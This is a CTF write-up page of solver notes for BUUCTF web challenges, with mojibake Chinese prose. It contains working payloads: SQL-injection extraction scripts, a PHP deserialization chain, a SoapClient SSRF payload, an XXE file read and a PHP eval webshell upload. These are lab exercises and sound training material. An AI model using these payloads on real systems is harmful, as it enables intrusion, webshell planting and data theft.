ITÊýÂë ¹ºÎï ÍøÖ· Í·Ìõ Èí¼þ ÈÕÀú ÔĶÁ ͼÊé¹Ý
TxTС˵ÔĶÁÆ÷
¡ýÓïÒôÔĶÁ,С˵ÏÂÔØ,¹ÅµäÎÄѧ¡ý
ͼƬÅúÁ¿ÏÂÔØÆ÷
¡ýÅúÁ¿ÏÂÔØͼƬ,ÃÀŮͼ¿â¡ý
ͼƬ×Ô¶¯²¥·ÅÆ÷
¡ýͼƬ×Ô¶¯²¥·ÅÆ÷¡ý
Ò»¼üÇå³ýÀ¬»ø
¡ýÇáÇáÒ»µã,Çå³ýϵͳÀ¬»ø¡ý
¿ª·¢: C++֪ʶ¿â Java֪ʶ¿â JavaScript Python PHP֪ʶ¿â È˹¤ÖÇÄÜ Çø¿éÁ´ ´óÊý¾Ý Òƶ¯¿ª·¢ ǶÈëʽ ¿ª·¢¹¤¾ß Êý¾Ý½á¹¹ÓëËã·¨ ¿ª·¢²âÊÔ ÓÎÏ·¿ª·¢ ÍøÂçЭÒé ϵͳÔËά
½Ì³Ì: HTML½Ì³Ì CSS½Ì³Ì JavaScript½Ì³Ì GoÓïÑÔ½Ì³Ì JQuery½Ì³Ì VUE½Ì³Ì VUE3½Ì³Ì Bootstrap½Ì³Ì SQLÊý¾Ý¿â½Ì³Ì CÓïÑÔ½Ì³Ì C++½Ì³Ì Java½Ì³Ì Python½Ì³Ì Python3½Ì³Ì C#½Ì³Ì
ÊýÂë: µçÄÔ ±Ê¼Ç±¾ ÏÔ¿¨ ÏÔʾÆ÷ ¹Ì̬ӲÅÌ Ó²ÅÌ ¶ú»ú ÊÖ»ú iphone vivo oppo СÃ× »ªÎª µ¥·´ ×°»ú ͼÀ­¶¡
 
   -> PHP֪ʶ¿â -> BuuctfÖ®Web(ËÄ) -> ÕýÎÄÔĶÁ

[PHP֪ʶ¿â]BuuctfÖ®Web(ËÄ)

[HFCTF2020]JustEscape

WP

vm2ɳºÐÌÓÒÝ

Éæ¼°µ½nodejs²»»á

[Íø¶¦±­2018]Unfinish

½Å±¾

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
#coding:utf-8
import requests
from bs4 import BeautifulSoup
import time

url = 'http://f8933a3b-5f22-4bde-bde9-7a49c4b1f0a4.node4.buuoj.cn:81/'

m = ''
for i in range(100):
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)
    register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}
    login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}
    req = requests.session()
    r1 = req.post(url+'register.php',data = register)
    r2 = req.post(url+'login.php', data = login)
    r3 = req.post(url+'index.php')
    html = r3.text
    soup = BeautifulSoup(html,'html.parser')
    UserName = soup.span.string.strip()
    if int(UserName) == 0:
        break
    m += chr(int(UserName))
    print(m)
    time.sleep(1)

[MRCTF2020]Ezaudit

¿¼µãÊÇmt_randµÄÖÖ×Ó,αËæ»ú,ºÍ֮ǰµÄÒ»¸öαËæ»úÌâÄ¿×ö·¨Ò»Ä£Ò»Ñù

×ܽá:

ÏȼÆËãÖÖ×Ó:

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38

# ÕâÊÇÀûÓù«Ô¿±¬ÆÆ˽ԿµÚÒ»²½¼ÆËãÖÖ×Ó
str1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2='KVQP0LdJKRaV3n9D'
str3 = str1[::-1]
length = len(str2)
res=''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
            break
print(res)

ÅäºÏphp_mt_seedÀ´½«ÖÖ×Ó±¬ÆƳöÀ´

ÔÙ¼ÆËã˽Կ:

<?php
//ÕâÊÇÀûÓù«Ô¿±¬ÆÆ˽ԿµÚ¶þ²½,ÖªµÀÖÖ×ÓÁ˱¬ÆÆ˽Կ
mt_srand(1775196155);
//¹«Ô¿
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
}
//˽Կ
function private_key($length = 12) {
	
	$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
	$private_key = '';
	for ( $i = 0; $i < $length; $i++ )
	$private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
	return $private_key;
}
echo "ÕâÊǹ«Ô¿:".public_key()."</br>";
echo "ÕâÊÇ˽Կ:".private_key()."</br>";
?> 

[Ç¿Íø±­ 2019]Upload

Ò»ÌõÁ´×Ó,¼òµ¥¿´ÁËÒ»ÏÂÍøÉϵÄwp¸Ð¾õÉÙµã

Ê×ÏÈ:

ÕÒµ½Õâ¸öÎļþÉÏ´«¼ì²â,»òÕßÓëÕâ¸öÎļþÉÏ´«ÓйصĵãÒ²¾ÍÊÇProfileÕâ¸ö×ÓÀà,ÒÔ¼°»¹»áÈÏΪÕâÊÇ·´ÐòÁл¯µÄÌâÄ¿ÊÇÔÚÕâÀï:

image-20211106112233632

¸ú×ÙÕâ¸öº¯Êý:

public function login_check(){
        $profile=cookie('user');
        if(!empty($profile)){
            $this->profile=unserialize(base64_decode($profile));
            $this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
            if(array_diff($this->profile_db,$this->profile)==null){//±È½ÏÁ½¸öÊý×éµÄÖµ,²¢·µ»Ø²î¼¯,Ò²¾ÍÊÇÒªÇóµÇ½ÐÅÏ¢Òª±£Ö¤Ò»ÖÂ,¸Ð¾õÕâÀï²»ÊÇÎÊÌâ,Ö»ÊǼì²éµÇ½ÐÅÏ¢¶øÒÑ
                return 1;
            }else{
                return 0;
            }
        }
    }

ͬʱÔÚ´ËphpÎļþÖпÉÒÔÀûÓÃconstructÀ´¸øÆ丳ֵΪ0Ö±½Ó²»¾­¹ý´ËifµÄÅжÏ

Ëû»á°ÑÄãcookieÖеÄuserµÄÖµÏÈbase64½âÂëÈ»ºó·´ÐòÁл¯,ÆäÖе¼Ö³öÏÖ©¶´µÄ´úÂëÊÇ

if($this->ext) {
            if(getimagesize($this->filename_tmp)) {
                @copy($this->filename_tmp, $this->filename);
                @unlink($this->filename_tmp);
                $this->img="../upload/$this->upload_menu/$this->filename";
                $this->update_img();
            }else{
                $this->error('Forbidden type!', url('../index'));
            }
        }else{
            $this->error('Unknow file type!', url('../index'));
        }
    }

ÕâÊÇËûµÄÎļþÉÏ´«µÄÌØÉ«,Êǽ«ÎļþÖØÃûÃû,µ¼ÖºóÆÚÎÒÃÇ¿ÉÒÔ½«jpgÎļþ¸ÄΪphpÎļþ

ÄÇôÏÂÃæ¾ÍÊÇÈçºÎµ÷ÓÃÕâ¸öupload_imgÕâ¸öº¯ÊýÁË,ÔÚ±¾Ò³µÄĩβÓÐÁ½¸öħÊõ·½·¨:

public function __get($name)//ÔÚµ÷ÓÃûÓÐȨÏÞµÄÊôÐÔ»òÕß²»´æµÄÊôÐÔʱ»á±»´¥·¢
    {
        return $this->except[$name];
    }

public function __call($name, $arguments)//ÔÚÌõÓò»´æÔڵķ½·¨Ê±½«»á±»´¥·¢
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

ÓÐÕâÁ½¸ö·½·¨µÄ´æÔÚÄÇôµ÷Óñ¾Ò³µÄº¯Êý¾Í²»³ÉÎÊÌâ,ÔÙ¼ÌÐøÑ°ÕÒÄÜ´¥·¢¸ÃÒ³ÃæµÄcall·½·¨µÄ·½·¨,ÐèÒªÔÚͬһ¸öÃüÃû¿Õ¼äÀïÃæ,ËùÒԺܿì¾ÍÕÒµ½ÁË:

public function __destruct()
    {
        if(!$this->registed){
            $this->checker->index();
        }
    }

exp:

<?php
namespace app\web\controller;
use think\Controller;
class Profile{
    public $checker = 0;
    public $filename_tmp = '../public/upload/fb7714fd023d486ddc9939267763bc21/a4a2c22c85451e94294fac2ec87c48c2.png';
    public $filename = '../public/upload/fb7714fd023d486ddc9939267763bc21/yn8rt.php';
    public $ext = 1;
    public $except = array('index' => 'upload_img');
}
class Register{
    public $checker;
    public $registed;
    public function __construct()
    {
        $this->checker=new Profile();
    }
}
$o = new Register();
echo base64_encode(serialize($o))
?>

[GYCTF2020]Easyphp

https://johnfrod.top/ctf/gyctf2020easyphp/

[GXYCTF2019]StrongestMind

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
from requests import *
import re
import time

s = session()
a = s.get("http://f7ec9408-bbeb-4a20-9e38-e4d90de04744.node4.buuoj.cn:81/")
pattern = re.findall(r'\d+.[+-].\d+', a.text)
c = eval(pattern[0])
a = s.post("http://f7ec9408-bbeb-4a20-9e38-e4d90de04744.node4.buuoj.cn:81/index.php", data = {"answer" : c})
for i in range(1005):
    try:
        pattern = re.findall(r'\d+.[+-].\d+', a.text)
        c = eval(pattern[0])
        print(c)
        a = s.post("http://f7ec9408-bbeb-4a20-9e38-e4d90de04744.node4.buuoj.cn:81/index.php", data = {"answer" : c})
        time.sleep(0.5)
        print(i)
    except:
        pass
print(a.text)

[SCTF2019]Flag Shop

https://www.freesion.com/article/9299639089/

[SUCTF 2018]GetShell

ÀûÓÃÈ¡·´Ð´Ä¾ÂíÀ´ÊµÏÖÈƹý

WP

bestphp¡¯s revenge

ÀûÓÃsoapclientÀ´ÊµÏÖssrf

<?php
$target = "http://127.0.0.1/flag.php";
$attack = new SoapClient(null,array('location' => $target,
    'user_agent' => "yn8rt\r\nCookie: PHPSESSID=l6ne21akbgdv48jff5h53go5i6\r\n",
    'uri' => "123"));
$payload = urlencode(serialize($attack));
echo $payload;
?>
    ?name=|O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A3%3A%22123%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A53%3A%22yn8rt%0D%0ACookie%3A+PHPSESSID%3Dl6ne21akbgdv48jff5h53go5i6%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D&f=session_start
	serialize_handler=php_serialize
    ?f=extract
    b=call_user_func

[b01lers2020]Life on Mars

û¿´Ã÷°×

[°²ä­±­ 2019]²»ÊÇÎļþÉÏ´«

strrchr() º¯Êý:²éÕÒ×Ö·û´®ÔÚÁíÒ»¸ö×Ö·û´®ÖÐ×îºóÒ»´Î³öÏÖµÄλÖÃ,²¢·µ»Ø´Ó¸ÃλÖõ½×Ö·û´®½áβµÄËùÓÐ×Ö·û¡£

WP

[ISITDTU 2019]EasyPHP

WP

ÀûÓÃÒì»òÔÙÒì»òÈƹý×Ö·ûÊýÏÞÖÆ

[GYCTF2020]Ez_Express

ѧϰJavaScriptÕâһƪ¾Í¹»ÁË

JSÔ­ÐÍÁ´ÎÛȾ³õ̽

¾ßÌå²Î¿¼pʦ¸µµÄÎÄÕÂ
³õ̽JavaScriptÔ­ÐÍÁ´ÎÛȾ

WP1

Ô­ÐÍÁ´ÎÛȾ

[RoarCTF 2019]Online Proxy

x-forwarded-for×¢Èë

¶þ´Î×¢Èë

äע

WP

[CSAWQual 2019]Web_Unagi

xxeµÄÈƹý

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

[HarekazeCTF2019]Avatar Uploader 1

WP

[GKCTF 2021]easycms

ÈÎÒâÎļþÏÂÔØ©¶´

WP

[BSidesCF 2019]SVGMagic

xxe©¶´

WP

[EIS 2019]EzPOP

WP

[N1CTF 2018]eating_cms

WP

[SWPU2019]Web4

WP

[FireshellCTF2020]Caas

WP

[¼«¿Í´óÌôÕ½ 2020]Roamphp1-Welcome

WP

[GXYCTF2019]BabysqliV3.0

<?php
error_reporting(0);
class Uploader{
	public $Filename;
	public $cmd;
	public $token;
	

	function __construct(){//¹¹Ô캯Êý
		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){//Èç¹ûÉèÖÃÁËnameͬʱ·ÀֹαЭÒé
			$this->Filename = $_GET['name'];//¿ÉÒÔ¿ØÖÆ
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;//·ñÔòÃû×ÖÓësessionÓйØ
		}

		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
		$this->token = $_SESSION['user'];
	}

	function upload($file){
		global $sandbox;
		global $ext;

		if(preg_match("[^a-z0-9]", $this->Filename)){    //²»ÒÔÊý×ÖºÍ×Öĸ¿ªÍ·
			$this->cmd = "die('illegal filename!');";
		}
		else{
			if($file['size'] > 1024){ //´óС²»¿É³¬¹ý1m
				$this->cmd = "die('you are too big (a€2a¨C?`?€?)');";
			}
			else{
				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";   //ÉÏ´«
			}
		}
	}

	function __toString(){
		global $sandbox;
		global $ext;
		// return $sandbox.$this->Filename.$ext;
		return $this->Filename;
	}

	function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}
}

if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		echo "???¨¦?¡é??¡¥?? ????? ????¨C???????<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

?>

[Black Watch ÈëȺÌâ]Web

Òì»ò½Å±¾

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
import requests

flag=''
#²é¿âÃû
payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1'    #¿âÃûΪnews

#²é±íÃû
payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1' #±íÃûΪadmin,contents

#²é×Ö¶Î
payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1'   #admin±íÀïÓÐid,username,password,is_enable
                                                                                                                                              # contents±íÀïÓÐid,title,content,is_enable

#²é×Ö¶ÎÖµ
payload4 = '1^(ascii(substr((select(group_concat(username))from(admin)),{},1))>{})^1'



for i in range(1,100):
    low =28
    high =137
    mid = (low + high) // 2

    while(low < high):
        url = 'http://1f8818ec-5797-4bee-b46f-9ec71dac112a.node4.buuoj.cn:81/backend/content_detail.php?id='
        payload = payload4.format(i,mid)
        url+=payload
        # print(url)
        r = requests.get(url)
        text = str(r.json())

        if "Ôýʦ¸µÈ±¸öÅ®ÅóÓÑ" in text:
            low = mid + 1
        else:
            high = mid

        mid = (low + high) // 2

    if(chr(mid)==''):
        break
    flag +=chr(mid)
    print(flag)

print(flag)

[SUCTF 2018]MultiSQL

WP

Ê®½øÖÆÈƹý¹ýÂËдÂí

[RoarCTF 2019]Simple Upload

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
import requests
# url = 'http://f98099c2-262f-472c-8002-393f7a2b62fd.node4.buuoj.cn:81/index.php/Home/index/upload'
# file1 = {'file':open('1.txt','r')}
# file2 = {'file[]':open('php.php','r')}
# file3 = {'file':open('1.txt','r')}
# r=requests.post(url,files=file1)
# print(r.text)
# r=requests.post(url,files=file2)
# print(r.text)
# r=requests.post(url,files=file3)
# print(r.text)
# dir='abcdefghijklmnopqrstuvwxyz0123456789'
# for i in dir:
#     for j in dir:
#         for x in dir:
#             for y in dir:
#                 for z in dir:
#                     url='http://f98099c2-262f-472c-8002-393f7a2b62fd.node4.buuoj.cn:81/Public/Uploads/2021-11-18/61961de{}{}{}{}{}.txt'.format(i,j,x,y,z)
#                     r = requests.get(url)
#                     print(url)
#                     if r.status_code== 200:
#                         print(url)
#                         break
'''·½·¨¶þ'''
url = "http://f98099c2-262f-472c-8002-393f7a2b62fd.node4.buuoj.cn:81/index.php/home/index/upload/"
s = requests.Session()
files = {"file": ("shell.<>php", "<?php eval($_GET['cmd'])?>")}
r = requests.post(url, files=files)
print(r.text)

[CISCN2019 »ª¶«ÄÏÈüÇø]Web4

wp

flask-session-managerʹÓÃ

[SUCTF 2018]annonymous

wp

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
import requests
for i in range(100):
    url = "http://4b101e75-e297-4884-98f3-52bd2aa1e4d9.node4.buuoj.cn:81/?func_name=%00lambda_{}".format(i)
    res = requests.get(url)
    if "flag" in res.text:
        print(res.text)
        break
    else:
        print('loading....')

[GoogleCTF2019 Quals]Bnv

WP

  PHP֪ʶ¿â ×îÐÂÎÄÕÂ
Laravel ÏÂʵÏÖ Google 2fa ÑéÖ¤
UUCTF WP
DASCTF10ÔÂ web
XAMPPÈÎÒâÃüÁîÖ´ÐÐÌáÉýȨÏÞ©¶´£¨CVE-2020-
[GYCTF2020]Easyphp
iwebsec°Ð³¡ ´úÂëÖ´Ðйؿ¨Í¨¹Ø±Ê¼Ç
¶à¸öÏß³Ìͬ²½Ö´ÐУ¬¶à¸öÏß³ÌÒÀ´ÎÖ´ÐУ¬¶à¸ö
php ûʼǼϳ£Ó÷½·¨ (TP5.1)
phpÖ®jwt
2021-09-18
ÉÏһƪÎÄÕ      ÏÂһƪÎÄÕ      ²é¿´ËùÓÐÎÄÕÂ
¼Ó:2021-11-23 12:08:25  ¸ü:2021-11-23 12:08:28 
 
¿ª·¢: C++֪ʶ¿â Java֪ʶ¿â JavaScript Python PHP֪ʶ¿â È˹¤ÖÇÄÜ Çø¿éÁ´ ´óÊý¾Ý Òƶ¯¿ª·¢ ǶÈëʽ ¿ª·¢¹¤¾ß Êý¾Ý½á¹¹ÓëËã·¨ ¿ª·¢²âÊÔ ÓÎÏ·¿ª·¢ ÍøÂçЭÒé ϵͳÔËά
½Ì³Ì: HTML½Ì³Ì CSS½Ì³Ì JavaScript½Ì³Ì GoÓïÑÔ½Ì³Ì JQuery½Ì³Ì VUE½Ì³Ì VUE3½Ì³Ì Bootstrap½Ì³Ì SQLÊý¾Ý¿â½Ì³Ì CÓïÑÔ½Ì³Ì C++½Ì³Ì Java½Ì³Ì Python½Ì³Ì Python3½Ì³Ì C#½Ì³Ì
ÊýÂë: µçÄÔ ±Ê¼Ç±¾ ÏÔ¿¨ ÏÔʾÆ÷ ¹Ì̬ӲÅÌ Ó²ÅÌ ¶ú»ú ÊÖ»ú iphone vivo oppo СÃ× »ªÎª µ¥·´ ×°»ú ͼÀ­¶¡

360ͼÊé¹Ý ¹ºÎï Èý·á¿Æ¼¼ ÔĶÁÍø ÈÕÀú ÍòÄêÀú 2024Äê11ÈÕÀú -2024/11/23 18:45:35-

ͼƬ×Ô¶¯²¥·ÅÆ÷
¡ýͼƬ×Ô¶¯²¥·ÅÆ÷¡ý
TxTС˵ÔĶÁÆ÷
¡ýÓïÒôÔĶÁ,С˵ÏÂÔØ,¹ÅµäÎÄѧ¡ý
Ò»¼üÇå³ýÀ¬»ø
¡ýÇáÇáÒ»µã,Çå³ýϵͳÀ¬»ø¡ý
ͼƬÅúÁ¿ÏÂÔØÆ÷
¡ýÅúÁ¿ÏÂÔØͼƬ,ÃÀŮͼ¿â¡ý
  ÍøÕ¾ÁªÏµ: qq:121756557 email:121756557@qq.com  ITÊýÂë